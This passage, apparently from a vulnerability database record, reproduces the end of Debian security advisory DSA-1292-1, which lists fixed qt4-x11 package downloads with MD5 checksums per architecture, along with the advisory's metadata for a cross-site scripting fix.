Size/MD5 checksum: 307298 a7b9d7864221d557ac0d5095e63dc4f8\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-dev-tools_4.2.1-2etch1_arm.deb\n Size/MD5 checksum: 770368 8d6748f88f3a9351298e0e347f408a43\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-dev-tools_4.2.1-2etch1_hppa.deb\n Size/MD5 checksum: 809216 1fe4fc9cdfe28bfad2414b4bec85af74\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-designer_4.2.1-2etch1_hppa.deb\n Size/MD5 checksum: 1128178 b8f54f880176fe7e12895ad9064c7c93\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-core_4.2.1-2etch1_hppa.deb\n Size/MD5 checksum: 1340368 255976d3ae74ca14515472d488901e64\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-debug_4.2.1-2etch1_hppa.deb\n Size/MD5 checksum: 58312188 d2f094e801e33e16a9446fe3572ca610\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql_4.2.1-2etch1_hppa.deb\n Size/MD5 checksum: 355658 a95ec7dcf56c20b954aee8ff10b0f173\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dev_4.2.1-2etch1_hppa.deb\n Size/MD5 checksum: 4739266 4143c9da6aa61901a3625d77c5c3c153\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qtconfig_4.2.1-2etch1_hppa.deb\n Size/MD5 checksum: 96074 140da2f0044b74ad4383d25ed34fc468\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-gui_4.2.1-2etch1_hppa.deb\n Size/MD5 checksum: 5280406 781a99fd06622a1990eaabd07d2e2712\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-qt3support_4.2.1-2etch1_hppa.deb\n Size/MD5 checksum: 1465076 dbd19481eb0e288eb7feeb31166821b4\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qtconfig_4.2.1-2etch1_i386.deb\n Size/MD5 checksum: 94586 eb2c6657681088447e0a585adf983138\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-designer_4.2.1-2etch1_i386.deb\n Size/MD5 checksum: 1066694 0c65ef16a35d69e972071299e1d3a13e\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-gui_4.2.1-2etch1_i386.deb\n Size/MD5 checksum: 4550080 81753f24013af9c577c7eb771434afbc\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dev_4.2.1-2etch1_i386.deb\n Size/MD5 checksum: 4199428 bbf899840ae7286865a92c9e17940291\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql_4.2.1-2etch1_i386.deb\n Size/MD5 checksum: 312216 48fc45a20df755a11f06e17b34800fa6\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-debug_4.2.1-2etch1_i386.deb\n Size/MD5 checksum: 57201286 b3050cfaf7da40499b893a10d34303f0\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-qt3support_4.2.1-2etch1_i386.deb\n Size/MD5 checksum: 1251866 754eca55b5ff761ac5bcaf210561dd72\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-dev-tools_4.2.1-2etch1_i386.deb\n Size/MD5 checksum: 746044 b488d7f7346dabef14ca25337efc5b94\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-core_4.2.1-2etch1_i386.deb\n Size/MD5 checksum: 1166868 5c6e7224ac092a5d662c21348bab2faf\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-debug_4.2.1-2etch1_ia64.deb\n Size/MD5 checksum: 60656170 7b72a4b2d98515ee515a7f10c9de1054\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-designer_4.2.1-2etch1_ia64.deb\n Size/MD5 checksum: 1157546 51a41ba4dbacde924848a945a1f81b21\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dev_4.2.1-2etch1_ia64.deb\n Size/MD5 checksum: 5375122 f5650dc28f8d1904477f84fa002a53ff\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-qt3support_4.2.1-2etch1_ia64.deb\n Size/MD5 checksum: 1740530 5203ed92c63ece02d823fa33bba90f19\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-gui_4.2.1-2etch1_ia64.deb\n Size/MD5 checksum: 6199458 d80d3c0c99eedff63b6232e19c5251fa\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql_4.2.1-2etch1_ia64.deb\n Size/MD5 checksum: 462094 4dbedf485d1ec9b8f58da266dc8d401c\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-dev-tools_4.2.1-2etch1_ia64.deb\n Size/MD5 checksum: 905070 433ea41ca28261e92f47f743963f1468\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-core_4.2.1-2etch1_ia64.deb\n Size/MD5 checksum: 1546870 a689b021b507768cd7d0baeb2754934a\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qtconfig_4.2.1-2etch1_ia64.deb\n Size/MD5 checksum: 108218 fa39a4c25e8bda9df57226b85922ac14\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-dev-tools_4.2.1-2etch1_mips.deb\n Size/MD5 checksum: 775224 97d4a39c282ca5a44ba10d74c6e1074d\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-qt3support_4.2.1-2etch1_mips.deb\n Size/MD5 checksum: 1267642 52a55aac3703510174eff514946e4621\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-gui_4.2.1-2etch1_mips.deb\n Size/MD5 checksum: 4575350 ee7acf7cc6cebaf05ddd3a31a1fadf27\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dev_4.2.1-2etch1_mips.deb\n Size/MD5 checksum: 4509728 db94a4a237eaefa2bf447f94bc888ec9\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-designer_4.2.1-2etch1_mips.deb\n Size/MD5 checksum: 1093532 d0aa4bcf536d5d7989cd8071af33217c\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-debug_4.2.1-2etch1_mips.deb\n Size/MD5 checksum: 60613590 1b0d386bcca8a00db87ca5a4e23e402a\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-core_4.2.1-2etch1_mips.deb\n Size/MD5 checksum: 1180824 54c2a87fd8d67361ebf5c78270f6a66b\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql_4.2.1-2etch1_mips.deb\n Size/MD5 checksum: 320206 7789c807a1fe31b4864c0c7807d4726f\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qtconfig_4.2.1-2etch1_mips.deb\n Size/MD5 checksum: 89790 7d8dc360830c9e26886997b7d936f865\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-debug_4.2.1-2etch1_mipsel.deb\n Size/MD5 checksum: 58682414 6ccf415d98066de8c88740f333650e75\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qtconfig_4.2.1-2etch1_mipsel.deb\n Size/MD5 checksum: 88984 f0d917896869a60c73d04143da8eb9ed\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-gui_4.2.1-2etch1_mipsel.deb\n Size/MD5 checksum: 4501958 e639d6d42ebcf1740d89aab3d0bb2349\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-qt3support_4.2.1-2etch1_mipsel.deb\n Size/MD5 checksum: 1244648 a61de73073314a993b1c496269f2386b\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-core_4.2.1-2etch1_mipsel.deb\n Size/MD5 checksum: 1165558 56cdfe56228f4997fdb4d55de9fe69c7\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-dev-tools_4.2.1-2etch1_mipsel.deb\n Size/MD5 checksum: 767872 12efd46d666b5bba92988f8978d9de2f\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-designer_4.2.1-2etch1_mipsel.deb\n Size/MD5 checksum: 1084962 c84ae262e8e990b023b983398c2fa264\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql_4.2.1-2etch1_mipsel.deb\n Size/MD5 checksum: 317962 86654f4e48815b73433cc490552bac34\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dev_4.2.1-2etch1_mipsel.deb\n Size/MD5 checksum: 4458462 b7da275811d0876147c89679719e6bda\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-qt3support_4.2.1-2etch1_powerpc.deb\n Size/MD5 checksum: 1260698 434fe2dea53091d065a051ebdfd185df\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql_4.2.1-2etch1_powerpc.deb\n Size/MD5 checksum: 314962 62d1fc646a8c3bfb4088de4cf8eefd0c\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-dev-tools_4.2.1-2etch1_powerpc.deb\n Size/MD5 checksum: 745092 1e2dbc6fcf92f9d7dd4dab742801b2b5\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qtconfig_4.2.1-2etch1_powerpc.deb\n Size/MD5 checksum: 92554 b8b238fa9a91213c282d6acb4a36c01a\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dev_4.2.1-2etch1_powerpc.deb\n Size/MD5 checksum: 4305914 ec352d9fa9ba15e7ad8d3208a1f4e88f\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-designer_4.2.1-2etch1_powerpc.deb\n Size/MD5 checksum: 1091118 3adfc9ee772f23aa0d0d86be3ae7b701\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-gui_4.2.1-2etch1_powerpc.deb\n Size/MD5 checksum: 4613226 3d8e6ecb9ff861f444b04e5c0032f6d5\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-debug_4.2.1-2etch1_powerpc.deb\n Size/MD5 checksum: 59534372 abe612c0bd5106df037b8d13773474b1\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-core_4.2.1-2etch1_powerpc.deb\n Size/MD5 checksum: 1208706 80591ac1f934fc4586cf75c3f18a2ef9\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-qt3support_4.2.1-2etch1_s390.deb\n Size/MD5 checksum: 1293112 98d87330afadfceeb02a9485ae462f09\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-dev-tools_4.2.1-2etch1_s390.deb\n Size/MD5 checksum: 755026 9f57b048c549abf1d5afbce1254c0866\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-core_4.2.1-2etch1_s390.deb\n Size/MD5 checksum: 1234676 e0ebb9c25313368b191a1787abf45068\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql_4.2.1-2etch1_s390.deb\n Size/MD5 checksum: 334764 0c2bc32d9b9b556c36afd728ca611dd8\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-debug_4.2.1-2etch1_s390.deb\n Size/MD5 checksum: 60276010 62f1448ae21529981eaf5c951e88934c\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qtconfig_4.2.1-2etch1_s390.deb\n Size/MD5 checksum: 84988 59d44e33d426d4c0cd33cc73d2408bfb\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dev_4.2.1-2etch1_s390.deb\n Size/MD5 checksum: 4187694 c96e42864ad741ce3937df5b3d6a4859\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-designer_4.2.1-2etch1_s390.deb\n Size/MD5 checksum: 1055562 c7991163a1460813235e40bedb1a09de\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-gui_4.2.1-2etch1_s390.deb\n Size/MD5 checksum: 4604590 fb787e541f7e908a2de260a59c4273a3\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 9, "modified": "2007-05-15T00:00:00", "published": "2007-05-15T00:00:00", "id": "DEBIAN:DSA-1292-1:E639E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00048.html", "title": "[SECURITY] [DSA 1292-1] New qt4-x11 packages fix cross-site scripting vulnerability", "type": "debian", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}